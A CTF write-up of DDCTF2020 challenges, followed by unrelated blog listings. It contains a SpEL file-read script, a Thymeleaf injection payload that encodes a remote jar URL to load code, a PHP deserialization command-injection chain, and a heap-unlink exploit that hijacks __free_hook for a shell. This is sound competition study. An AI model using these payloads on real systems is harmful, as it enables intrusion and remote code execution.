DDCTF2020 Writeup
DDCTF2020 Writeup
全靠lfy带飞orz.
Web
Web1
照着来一遍请求,拿到jwt,jwt.io看一下是hs256
跑一下key是1,伪造即可拿到client
client抓请求发现signature对即可:
逆client,得到signature请求逻辑,根据输出格式、输出长度以及输入,判断出签名是hmacsha256算法,然后密钥是DDCTFWithYou,写个签名脚本打一下
import requests
import json
import hmac
import base64
from hashlib import sha256
import timeurl = "http://117.51.136.197/server/health"
a = requests.get(url)
print(a.text)
t = int(time.time())
cmd = 'T(java.net.URLClassLoader).getSystemClassLoader().loadClass("java.nio.file.Files").readAllLines(T(java.net.URLClassLoader).getSystemClassLoader().loadClass("java.nio.file.Paths").get("/home/dc2-user/flag/flag.txt"))'
appsecret = "DDCTFWithYou".encode('utf-8')
data = f"{cmd}|{t}".encode('utf-8')
print(data)
signature = base64.b64encode(hmac.new(appsecret, data, digestmod=sha256).digest())
print(signature)
data = {"signature":signature.decode(),"command":f"{cmd}","timestamp":t}
print(json.dumps(data))
url = "http://117.51.136.197/server/command"
headers = {'Content-Type': 'application/json',"User-Agent":"Go-http-client/1.1","Accept-Encoding":"gzip"}
a = requests.post(url=url,headers=headers,data = json.dumps(data))
print(a.text)
然后测了一下’1’+'1’发现是11,然后根据404后端是个java,感觉是spel,测了一下读文件拿到flag
web2
一看就感觉可能有溢出或者高并发问题。
int:
long long:
感觉可能是数据库两个表类型不一样导致的?
然后就能兑换礼物了
随便测了个404,发现熟悉的404页面,写过的都知道是gin
还给了secret key,很容易想到伪造session,把之前的session解两次b64发现有admin,用现成工具伪造一下即可
web3
打开发现登陆,尝试弱口令失败,在返回包里面发现rememberMe=deteleMe 跑了一下shiro的key没跑出来。
测了一下shiro最近的几个bypass,发现第二个可以:
http://116.85.37.131/34867ccfda85234382210155be32525c/;/web/index
查看代码发现img路由有个任意读,然后慢慢读web.xml、spring-core.xml等等,还是找不全源码,最后猜测的去读controller拿到AuthController和IndexController两个:
看到auth路由跳转了http://116.85.37.131/34867ccfda85234382210155be32525c/;/web/68759c96217a32d5b368ad2965f625ef/index,发现是个render,结合刚才web.xml读到了,信息中有thymeleaf,猜测可能是thymeleaf渲染,类似ssti。
测一手[[${1+1}]], 返回2,ok
后边就是绕黑名单。测了好久,很多种思路都发现被ban了。。
思路过程:
bcel -> org.apache本ban
mlet/jdbcrowset -> 两次set被ban
ServiceLoader/com.sun.naming.internal.VersionHelper.getVersionHelper().loadClass也被ban
最后觉得只能绕字符过滤了。。过滤了’ ", 尝试new byte发现byte也没了。。
String.valueOf((char)97)这种发现spel没有char
最后在一篇国外的文章中收到启发绕过引号 http://deadpool.sh/2017/RCE-Springs/
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).get
Runtime().exec(T(java.lang.Character).toString(99).concat(T(ja
va.lang.Character).toString(97)).concat(T(java.lang.Character).toStri
ng(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.la
ng.Character).toString(47)).concat(T(java.lang.Character).toString(10
1)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.C
haracter).toString(99)).concat(T(java.lang.Character).toString(47)).c
oncat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).
toString(97)).concat(T(java.lang.Character).toString(115)).concat
(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toStrin
g(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
如果可以拿到T(java.lang.Character)的话就可以toString去构造出字符串来,不需要用引号,但是java.lang在waf里面,然后就去找继承java.lang.Character的类,发现是final定义,没有继承类。
翻了半天文档找到: https://blog.csdn.net/hry2015/article/details/72668376
// 对于java.lang下面的类, T()可以不指定全限定名称: 输出 --> java.lang.String*
@Value("#{ T(String)}")
private Class<?> tLangString;
所以可以直接T(Character)去构造出字符串了。
然后尝试nio那个payload去读文件看看
T(java.net.URLClassLoader).getSystemClassLoader().loadClass("java.nio.file.Files").readAllLines(T(java.net.URLClassLoader).getSystemClassLoader().loadClass("java.nio.file.Paths").get("/flag"))
但是read关键词在waf中,然后其他的读文件的payload貌似也触发了io的waf,所以换urlclassloader。
urlclassloader写一下payload完事
content=[[${new+java.net.URLClassLoader(new+java.net.URL[]{new+java.net.URL(T(Character).toString(104)%2bT(Character).toString(116)%2bT(Character).toString(116)%2bT(Character).toString(112)%2bT(Character).toString(58)%2bT(Character).toString(47)%2bT(Character).toString(47)%2bT(Character).toString(49)%2bT(Character).toString(51)%2bT(Character).toString(57)%2bT(Character).toString(46)%2bT(Character).toString(49)%2bT(Character).toString(57)%2bT(Character).toString(57)%2bT(Character).toString(46)%2bT(Character).toString(50)%2bT(Character).toString(48)%2bT(Character).toString(51)%2bT(Character).toString(46)%2bT(Character).toString(50)%2bT(Character).toString(53)%2bT(Character).toString(51)%2bT(Character).toString(58)%2bT(Character).toString(49)%2bT(Character).toString(50)%2bT(Character).toString(51)%2bT(Character).toString(52)%2bT(Character).toString(47)%2bT(Character).toString(108)%2bT(Character).toString(102)%2bT(Character).toString(121)%2bT(Character).toString(46)%2bT(Character).toString(106)%2bT(Character).toString(97)%2bT(Character).toString(114))}).loadClass(T(Character).toString(65)).getConstructor().newInstance().toString()}]]
web4
find那边的escapeshellcmd没用,防不了参数注入。直接-exec就完了
然后unset这里用对象掉用任意方法调用get_flag就行
public function __unset($key){$func = $this->content;return $func();}
exp
<?phpclass ShowOff {public $contents;public $page;
}class HintClass {// protected $hint = "local_file:///etc/passwd";protected $hint = "execute";public $execute;
}class MiddleMan {private $cont = 1;public $content;
}class MyClass
{var $kw0ng;var $flag;
}$mc = new MyClass();
$mc->flag = "-exec ls -al / ;";$mid2 = new MiddleMan();
$mid2->content = [$mc,'get_flag'];$c = new ShowOff();
$c->page = $mid2;
$c->contents = "a";echo urlencode(serialize($c));?>
misc1
公告里面有flag cv一下就是了
misc2
湖湘杯时候留的脚本,直接用就行。。
当时的思路是对比灰度,拿到碎片在原图的位置,然后拼一张新图。
核心代码:
def compare_by_rgb(rgb_source, rgb_flag):count = len(rgb_source)differ = 0for i in range(count):if rgb_source[i] == rgb_flag[i]:differ += 1return round(differ / count * 100, 2)
misc3
加密流程如下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2by3PJli-1599830498217)(https://i.loli.net/2020/09/05/kvygfWzcEDHBn2L.png)]
其中,最后两次异或,xor k3, shl 7, xor k4,可以归约为一次异或,即xor k34, shl 7(k34与k3+k4的异或效果等价)。很容易推导,不在此展示了。
因此,虽然有5组子密钥,但实际上,有效密钥仅k0, k1, k2, k34,每组子密钥长度应该也为12bit,因此有效密钥长度为(212)4=248(2^{12})^4 = 2^{48}(212)4=248。
一个比较容易想到的攻击方法就是Meet in the Middle Attack(中间相遇攻击):
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-N8JRA5gG-1599830498218)(https://i.loli.net/2020/09/05/tZxeIKErqiFYVbP.png)]
但是每列一个表,对应的k0,k1(k2, k34)就有409624096^240962种,也就是说表长为409624096^240962;而表中的结果只有4096种可能,两个表碰撞到的次数太多了。
一组已知的明密文对,仅能够将搜索范围减少4096倍,即409644096^440964减少到409634096^340963。至少需要4组明密文对才能将4个key确定下来。还需要分别花费40963,40962,40964096^3, 4096^2, 409640963,40962,4096的内存去记录下这些candidate keys,太麻烦了。
观察到密钥空间仅为40964=2484096^4 = 2^{48}40964=248,也不算是很大。烧点钱,买点服务器,暴力跑,就完事了。
所以,我们在某云服务器提供商处租用了48 + 3*32 = 144核的云服务器,然后写了一个简单的C程序,对key进行爆破:
#include<stdio.h>
#include<stdint.h>#define u16 uint16_tu16 sbox0[] = {...
};u16 sbox1[] = {...
};u16 inp[] = {2684, 3599, 1079, 633, 1799, 1121, 1766, 364, 1943, 873, 1842, 104, 1559, 800, 1590, 3941, 1894, 3948, 1894, 1380, 519, 1135, 1654, 1396, 1670, 1394, 519, 1897, 1862, 2080, 1591, 633, 1799, 1135, 1655, 609, 1798, 2169
};u16 out[] = {2568, 3185, 567, 361, 1793, 1001, 3036, 2896, 307, 258, 3884, 2240, 2214, 2489, 993, 2168, 2759, 2361, 2759, 73, 2269, 3421, 3808, 415, 1214, 1260, 2269, 934, 300, 2160, 2209, 361, 1793, 3421, 990, 790, 2503, 2845
};u16 ror7(u16 b) {return ((((b) & 4095) >> 7) | (((b) << 5) & 4095));
}int main(int argc, char* argv[]) {#pragma omp parallel forfor (u16 k0=48*20+32*90; k0 < 4096; k0++) {printf("k0: %d\n", k0);for (u16 k1=0; k1 < 4096; k1++) {// printf("k1: %d\n", k1);for (u16 k2=0; k2 < 4096; k2++) {for (u16 k34=0; k34 < 4096; k34++) {int FLAG = 1;for (int i=0; i < 38; i++) {if (ror7(sbox0[sbox1[sbox0[k0 ^ inp[i]] ^ k1] ^ k2] ^ k34) != out[i]) {FLAG = 0;break;}}if (FLAG == 1) {printf("%d, %d, %d, %d\n", k0, k1, k2, k34);}}}}}
}
编译运行
$ gcc -fopenmp exp.c -o exp
$ ./exp
对于每个k0,遍历409634096^340963所有的k1, k2, k34单核大概需要14min。
我们有144核,需要跑4096个k0,所以算下来,只需要不到7h就可以跑完。
运气比较好,大概跑了3h就找到了key:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-g9U7KY9p-1599830498219)(https://i.loli.net/2020/09/05/xMZO2gopbaiGHtk.jpg)]
k34是等价的k3 + k4
改一下源程序里的解密部分,即可getflag。
# ...Class Cipher(object):# ...def decrypt_bits(self, b):unboxed = self.rol7(b & BIT_MASK) ^ self.k3 # changed here!return (self.rsbox0[self.rsbox1[self.rsbox0[unboxed] ^ self.k2] ^ self.k1] ^ self.k0)# ...def getflag():flag_enc = bytes.fromhex("8ed251b186921842b7fc62b708c18d87729a8771f85755733e12e4caedd51fa2ee7062ceae41dff01dcf").decode("latin-1")c = Cipher(3488, 2863, 726, 1886, 0)print(c.decrypt(flag_enc))if __name__ == "__main__":getflag()
# DDCTF{2c38c38011e31e919dcd54c8ebd23491}
DDCTF{2c38c38011e31e919dcd54c8ebd23491}
pwn
首先这个add会是可变数组,然后在0x605380处有5个指针
1.可变数组的chunk地址
2.可变数组剩余空间的起始地址
3.可变数组的结束地址
4.可变数组的start地址
5.可变数组的end地址
漏洞点在于show()函数调用的里面,如果可变数组满了会申请一个块,将之前的数据memmove拷贝到新chunk里面,同时更新0x605380处的指针
而0x605380 + 0x18处的指针是作为可变数组的start处的指针,此处没有及时更新,而第5个指针更新了数组的end,所以此处通过edit可以向下溢出,edit完之后start指针变成当前块的位置
既然没有开启pie随机化,那么可以考虑unlink,而unlink想要把bss的指针给劫持下来,那么就需要绕过 FD->bk==p && BK->fd == p两个判断
调试一下可发现,在遍历可变数组的时候,其start指针会随之移动,然后利用此处指针和show()新申请的块伪造一个unlink结构,即可将start指针修改成0x605380
之后就是通过start指针将bss上其他三个指针修改,实现任意写,只需要往hook或者got表里面写入一个rce即可
for i in range(16):new(i)
show()
写入16个整型值,当show的时候会新申请一个块,之前的块放进unsorted bin中,但是start指针没有更新,可以leak出libc_base
for i in range(8):new(0x20)
for i in range(8):no()
edit('-16')
edit(0x90)
edit(0)
edit(0x21)
edit(0x605398 - 0x18)
edit(0x605398 - 0x10)
写入8个整型值,show的时候同样会申请一个块,然后溢出,此处就修改新申请的块prevsize大小为-0x10
当下一次show()函数中申请新chunk会free掉上一次show()中申请的chunk,由于old chunk中prevsize被我们修改成-0x10,又由于有符号的原因
所以向下与块合并,即可往bss段上写入一个bss地址,然后实现任意写
edit(free_hook - 8)
edit(free_hook + 8)
edit(0)
edit(0x605398)
edit(0x6053A8)show()edit(0x68732F6E69622F)
edit(system)
然后如此修改,即可劫持到free_hook上方,因为在free_hook -8处写入一个/bin/sh的64位整型值,free_hook写system然后clear即可getshell
from pwn import *
context.log_level = 'DEBUG'
def menu(ch):p.sendlineafter('>>',str(ch))
def new(size):menu(1)p.sendlineafter('Input your num:',str(size))
def show():menu(2)
def clear():menu(3)
def edit(value):p.sendlineafter('Edit (y/n):','y')p.sendline(str(value))
def no():p.sendlineafter('Edit (y/n):','n')
p = remote("117.51.143.25",5005)
libc =ELF('./libc-2.23.so')
for i in range(16):new(i)
show()
p.recvuntil('1:')
libc_base = int((p.recvuntil('\n',drop=True)),10) - libc.sym['__malloc_hook'] -0x10 - 88
log.info('LIBC:\t' + hex(libc_base))
for i in range(34):no()
clear()
new(0)
new(1)
clear()
new(0)
new(1)
show()
p.recvuntil('1:')
heap_base = int((p.recvuntil('\n',drop=True)),10) - 0x11C30
log.info('HEAP:\t' + hex(heap_base))
IO_list_all = libc_base + libc.sym['_IO_list_all']
for i in range(10):no()
clear()
binsh = libc_base + libc.search('/bin/sh').next()
system = libc_base + libc.sym['system']
Global_max_fast = libc_base + 0x3C67F8
free_hook = libc_base + libc.sym['__free_hook']
for i in range(8):new(0x20)
show()
for i in range(8):no()
edit('-16')
edit(0x90)
edit(0)
edit(0x21)
edit(0x605398 - 0x18)
edit(0x605398 - 0x10)
for i in range(4):no()
for i in range(7):new(0x21)
show() # trigger
edit(free_hook - 8)
edit(free_hook + 8)
edit(0)
edit(0x605398)
edit(0x6053A8)
show()
edit(0x68732F6E69622F)
edit(system)
clear()
p.interactive()
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 被老板批评“公司离开谁都照转,谁的工作干不好谁走人”,你会立马辞职吗?
1. 场景描述 最近在平台上回复了一些问题,有点散,整理下,发出来,朋友们一些探讨! 2. 解决方案 (话题1)老板在会议上批评你“公司离开谁都照转,谁的工作干不好谁走人”,…...
2024/3/10 4:55:59 - ML之FE:利用【数据分析+数据处理】算法对国内某平台2020年6月份房价数据集【12+1】进行特征工程处理(史上最完整,建议收藏)
ML之FE:利用【数据分析数据处理】算法对国内某平台2020年6月份房价数据集【121】进行特征工程处理(史上最完整,建议收藏) 利用【数据分析数据处理】算法对链家房价数据集【121】进行特征工程处理 1、数据集信息输出 1.1、输出基本信息 shapeÿ…...
2024/5/5 18:30:44 - anaconda、tensorflow、pycharm安装详细记录
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、anaconda的下载和安装1. 下载2. 安装二、tensorflow的安装1. 安装2. 测试三、PyCharm的安装和简单使用1. 安装2. 简单使用总结前言 本篇博客主要记录window…...
2024/4/24 15:03:17 - 2020R2移动式压力容器充装考试及R2移动式压力容器充装考试试题
题库来源:安全生产模拟考试一点通公众号小程序 2020R2移动式压力容器充装考试及R2移动式压力容器充装考试试题,包含R2移动式压力容器充装考试答案解析及R2移动式压力容器充装考试试题练习。由安全生产模拟考试一点通公众号结合国家R2移动式压力容器充装…...
2024/4/25 9:39:03 - 字节跳动工作一年,附上百度、拼多多、字节跳动等后台面经,谈谈我的收获
转眼已经工作入职一年的时间了,还是有非常多收获的,感谢这一年的时光,感谢所有遇到的人,让我变成更好的自己。 正所谓满园春色关不住,一枝红杏出墙来,带着满满的收获我开始了大规模的面试,拿到…...
2024/4/17 15:40:48 - 加拿大皇家科学院新一轮院士出炉!张大鹏教授及多位华人入选
加拿大皇家科学院新一轮院士出炉!张大鹏教授及多位华人入选 道翰天琼认知智能机器人平台API接口大脑为您揭秘。加拿大皇家学会(RSC)成立于1882年,由艺术&人文、科学研究院以及新学者、艺术与科学学院组成。RSC在加拿大以及世界…...
2024/4/28 0:41:43 - redis高级(缓存穿透 雪崩 击穿 集群方案--主从 哨兵 cluster)
redis高级1. Redis缓存相关问题1.1 缓存穿透1.2 缓存雪崩1.3 缓存击穿2. Redis集群方案2.1 主从复制Replication2.2 哨兵sentinel2.2.1 高可用介绍2.2.3 Redis sentinel使用Redis内置集群cluster2.3.1 Redis cluster介绍2.3.2 哈希槽方式分配数据2.3.3 Redis cluster的主从模式…...
2024/4/27 1:13:31 - CGB2005 0911 jt13
1整合总结 复习 命令怎么敲 方法就怎么调 json是特殊的数据交换格式 一个是数组 一个是单个的 AOP实现redis缓存 现有代码的分析 重讲aop 会导致业务层和redis代码绑死 不便于扩展 service只想完成业务逻辑 所以提出需求 AOP AOP说明 名称:面向切面编程 一句话总结:在…...
2024/4/17 15:40:50 - 哈哈怪的自我介绍
立志成为程序媛 自我介绍 年龄:19姓名:刘燕兴趣:看有关悬疑的一切,比如电影电视剧。像犯罪大师这个软件我很喜欢,最喜欢东野圭吾,喜欢他写的《嫌疑人X的献身》后来拍成电影,又看了好几遍。&am…...
2024/4/21 20:47:22 - 2020电工(初级)证考试及电工(初级)考试软件
题库来源:安全生产模拟考试一点通公众号小程序 2020电工(初级)证考试及电工(初级)考试软件,包含电工(初级)证考试答案解析及电工(初级)考试软件练习。由安全…...
2024/3/12 1:48:50 - 02.CentOS7学习笔记--VMware 安装 CentOS7
下载 CentOS 7 的 iso 镜像 https://gitee.com/zhuzhulu/java-dev-software https://www.centos.org/download/ 建议下载 CentOS-7-x86_64-DVD 版本的 .torrent 文件,然后使用支持 BT 协议的下载工具(迅雷、FDM、BitComet、qBittorrent 等)…...
2024/4/28 2:01:49 - 工程管理文件Makefile
一、工程管理文件Makefile 1.什么是makefile? 用来管理一个工程中的所有关联文件的文件:头文件、源文件、库文件。。。 2.makefile文件在工程中一定要有吗? 不一定 一般原则,若编译命令比较复杂时,会写makefile文件 若…...
2024/4/4 18:18:15 - mysql外键建立图解
较为详细的说明,可以参考 不完善,但又划不着丢掉。...
2024/4/23 15:43:12 - 包机制和JavaDoc生成文档
包机制和JavaDoc生成文档 包机制 一般利用公司域名倒置作为包名,如com.baidu.www,包语句必须放在最前面导入包时使用import语句,放到包语句后面,如import com.zhemowang.base.Demo1;想导入一个包中的所有类使用通配符*࿰…...
2024/5/4 10:54:04 - 学习笔记——数据分析在电商行业常用的分析方法
电商行业分析方法细分思想与“人——货——场”“人—货—场”能够为人提供宏观视野的分析。其原理类似于分类分析,即将所有需要被分析到的数据单元,打上“人”“货”“场”的标签,然后再进行相应的数据分析与处理。在实际应用场景中…...
2024/4/26 6:22:52 - 30个Python极简代码
学 Python 怎样才最快,当然是实战各种小项目,只有自己去想与写,才记得住规则。本文是 30 个极简任务,初学者可以尝试着自己实现;本文同样也是 30 段代码,Python 开发者也可以看看是不是有没想到的用法。 Py…...
2024/5/4 5:55:46 - 一次线上oom问题记录
某天早上发现服务无法正常访问,于是展开问题排查。 1。首先查看日志,发现有oom日志存在。 这时候看到oom,犯了想当然的错误,认为是内存不足,堆内存空间已经用完。于是查看代码发现某个模块中有如下代码: 谁…...
2024/3/12 1:13:30 - 交叉编译(交叉工具链)
一、交叉编译(交叉工具链) 在一个环境下编译生成一个可以在另一个环境中执行的可执行文件的工具本地编译命令 gcc 实现把高级语言的C文件,翻译成二进制文件 是可以在虚拟机中找到的: which gcc 用来查找命令位置的命令 若目标命令…...
2024/3/12 2:11:55 - Web入门之Tomcat和HTTP协议
Web入门之Tomcat和HTTP协议1. JAVA WEB前奏(了解)1.1. C/S结构1.2. B/S结构1.3. 静态网页和动态网页1.4. 常见的网页1.5. Web服务器2. Tomcat安装(熟练)2.1. Tomcat概述2.2. Tomcat的作用2.3. Tomcat安装2.4. Tomcat测试3. Tomcat分析(熟练)3.1. Tomcat目录结构3.2. Tomcat修改…...
2024/4/26 1:08:58 - FLAT:中文NER屠榜之作!复旦大学邱锡鹏团队出品
FLAT:中文NER屠榜之作!复旦大学邱锡鹏团队出品 道翰天琼认知智能机器人平台API接口大脑为您揭秘。近年来,引入词汇信息逐渐成为提升中文NER指标的重要手段。ACL2020中一篇来自复旦大学邱锡鹏老师团队的 FLAT: Chinese NER Using Flat-Lattic…...
2024/5/2 17:35:15
最新文章
- 开源版本管理系统的搭建二:SVN部署及使用
作者:私语茶馆 1. Visual SVN Server部署 SVN Server部署包括: 创建版本仓库创建用户 这些部署是通过VisualSVN Server Manager实现的,如下图: VisualSVN Server Manager(安装后自带) 1.1.SVN 初始化配…...
2024/5/6 4:13:17 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/3/20 10:50:27 - Java-运算符
运算符 Java语言支持如下运算符: 算术运算符:,-,*,/,%,,--复制运算符:关系运算符:>, <, >, <, , !instanceof逻辑运算符:&&…...
2024/5/5 8:51:26 - 【蓝桥杯】省模拟赛
题目 1.奇数次数2.最小步数3.最大极小值和最小极大值 1.奇数次数 问题描述 给定一个仅包含数字字符的字符串,统计一下这个字符串中出现了多少个值为奇数的数位。 输入格式 输入一行包含一个字符串,仅由数字字符组成。 输出格式 输出一行包含一个整数&am…...
2024/5/1 19:23:28 - 416. 分割等和子集问题(动态规划)
题目 题解 class Solution:def canPartition(self, nums: List[int]) -> bool:# badcaseif not nums:return True# 不能被2整除if sum(nums) % 2 ! 0:return False# 状态定义:dp[i][j]表示当背包容量为j,用前i个物品是否正好可以将背包填满ÿ…...
2024/5/5 18:19:03 - 【Java】ExcelWriter自适应宽度工具类(支持中文)
工具类 import org.apache.poi.ss.usermodel.Cell; import org.apache.poi.ss.usermodel.CellType; import org.apache.poi.ss.usermodel.Row; import org.apache.poi.ss.usermodel.Sheet;/*** Excel工具类** author xiaoming* date 2023/11/17 10:40*/ public class ExcelUti…...
2024/5/5 12:22:20 - Spring cloud负载均衡@LoadBalanced LoadBalancerClient
LoadBalance vs Ribbon 由于Spring cloud2020之后移除了Ribbon,直接使用Spring Cloud LoadBalancer作为客户端负载均衡组件,我们讨论Spring负载均衡以Spring Cloud2020之后版本为主,学习Spring Cloud LoadBalance,暂不讨论Ribbon…...
2024/5/5 19:59:54 - TSINGSEE青犀AI智能分析+视频监控工业园区周界安全防范方案
一、背景需求分析 在工业产业园、化工园或生产制造园区中,周界防范意义重大,对园区的安全起到重要的作用。常规的安防方式是采用人员巡查,人力投入成本大而且效率低。周界一旦被破坏或入侵,会影响园区人员和资产安全,…...
2024/5/4 23:54:44 - VB.net WebBrowser网页元素抓取分析方法
在用WebBrowser编程实现网页操作自动化时,常要分析网页Html,例如网页在加载数据时,常会显示“系统处理中,请稍候..”,我们需要在数据加载完成后才能继续下一步操作,如何抓取这个信息的网页html元素变化&…...
2024/5/5 15:25:47 - 【Objective-C】Objective-C汇总
方法定义 参考:https://www.yiibai.com/objective_c/objective_c_functions.html Objective-C编程语言中方法定义的一般形式如下 - (return_type) method_name:( argumentType1 )argumentName1 joiningArgument2:( argumentType2 )argumentName2 ... joiningArgu…...
2024/5/4 23:54:49 - 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】
👨💻博客主页:花无缺 欢迎 点赞👍 收藏⭐ 留言📝 加关注✅! 本文由 花无缺 原创 收录于专栏 【洛谷算法题】 文章目录 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】🌏题目描述🌏输入格…...
2024/5/4 23:54:44 - 【ES6.0】- 扩展运算符(...)
【ES6.0】- 扩展运算符... 文章目录 【ES6.0】- 扩展运算符...一、概述二、拷贝数组对象三、合并操作四、参数传递五、数组去重六、字符串转字符数组七、NodeList转数组八、解构变量九、打印日志十、总结 一、概述 **扩展运算符(...)**允许一个表达式在期望多个参数࿰…...
2024/5/6 1:08:53 - 摩根看好的前智能硬件头部品牌双11交易数据极度异常!——是模式创新还是饮鸩止渴?
文 | 螳螂观察 作者 | 李燃 双11狂欢已落下帷幕,各大品牌纷纷晒出优异的成绩单,摩根士丹利投资的智能硬件头部品牌凯迪仕也不例外。然而有爆料称,在自媒体平台发布霸榜各大榜单喜讯的凯迪仕智能锁,多个平台数据都表现出极度异常…...
2024/5/5 18:50:00 - Go语言常用命令详解(二)
文章目录 前言常用命令go bug示例参数说明 go doc示例参数说明 go env示例 go fix示例 go fmt示例 go generate示例 总结写在最后 前言 接着上一篇继续介绍Go语言的常用命令 常用命令 以下是一些常用的Go命令,这些命令可以帮助您在Go开发中进行编译、测试、运行和…...
2024/5/6 0:27:44 - 用欧拉路径判断图同构推出reverse合法性:1116T4
http://cplusoj.com/d/senior/p/SS231116D 假设我们要把 a a a 变成 b b b,我们在 a i a_i ai 和 a i 1 a_{i1} ai1 之间连边, b b b 同理,则 a a a 能变成 b b b 的充要条件是两图 A , B A,B A,B 同构。 必要性显然࿰…...
2024/5/5 2:25:33 - 【NGINX--1】基础知识
1、在 Debian/Ubuntu 上安装 NGINX 在 Debian 或 Ubuntu 机器上安装 NGINX 开源版。 更新已配置源的软件包信息,并安装一些有助于配置官方 NGINX 软件包仓库的软件包: apt-get update apt install -y curl gnupg2 ca-certificates lsb-release debian-…...
2024/5/4 21:24:42 - Hive默认分割符、存储格式与数据压缩
目录 1、Hive默认分割符2、Hive存储格式3、Hive数据压缩 1、Hive默认分割符 Hive创建表时指定的行受限(ROW FORMAT)配置标准HQL为: ... ROW FORMAT DELIMITED FIELDS TERMINATED BY \u0001 COLLECTION ITEMS TERMINATED BY , MAP KEYS TERMI…...
2024/5/5 13:14:22 - 【论文阅读】MAG:一种用于航天器遥测数据中有效异常检测的新方法
文章目录 摘要1 引言2 问题描述3 拟议框架4 所提出方法的细节A.数据预处理B.变量相关分析C.MAG模型D.异常分数 5 实验A.数据集和性能指标B.实验设置与平台C.结果和比较 6 结论 摘要 异常检测是保证航天器稳定性的关键。在航天器运行过程中,传感器和控制器产生大量周…...
2024/5/4 13:16:06 - --max-old-space-size=8192报错
vue项目运行时,如果经常运行慢,崩溃停止服务,报如下错误 FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory 因为在 Node 中,通过JavaScript使用内存时只能使用部分内存(64位系统&…...
2024/5/5 17:03:52 - 基于深度学习的恶意软件检测
恶意软件是指恶意软件犯罪者用来感染个人计算机或整个组织的网络的软件。 它利用目标系统漏洞,例如可以被劫持的合法软件(例如浏览器或 Web 应用程序插件)中的错误。 恶意软件渗透可能会造成灾难性的后果,包括数据被盗、勒索或网…...
2024/5/5 21:10:50 - JS原型对象prototype
让我简单的为大家介绍一下原型对象prototype吧! 使用原型实现方法共享 1.构造函数通过原型分配的函数是所有对象所 共享的。 2.JavaScript 规定,每一个构造函数都有一个 prototype 属性,指向另一个对象,所以我们也称为原型对象…...
2024/5/5 3:37:58 - C++中只能有一个实例的单例类
C中只能有一个实例的单例类 前面讨论的 President 类很不错,但存在一个缺陷:无法禁止通过实例化多个对象来创建多名总统: President One, Two, Three; 由于复制构造函数是私有的,其中每个对象都是不可复制的,但您的目…...
2024/5/4 23:54:30 - python django 小程序图书借阅源码
开发工具: PyCharm,mysql5.7,微信开发者工具 技术说明: python django html 小程序 功能介绍: 用户端: 登录注册(含授权登录) 首页显示搜索图书,轮播图࿰…...
2024/5/5 17:03:21 - 电子学会C/C++编程等级考试2022年03月(一级)真题解析
C/C++等级考试(1~8级)全部真题・点这里 第1题:双精度浮点数的输入输出 输入一个双精度浮点数,保留8位小数,输出这个浮点数。 时间限制:1000 内存限制:65536输入 只有一行,一个双精度浮点数。输出 一行,保留8位小数的浮点数。样例输入 3.1415926535798932样例输出 3.1…...
2024/5/5 15:25:31 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
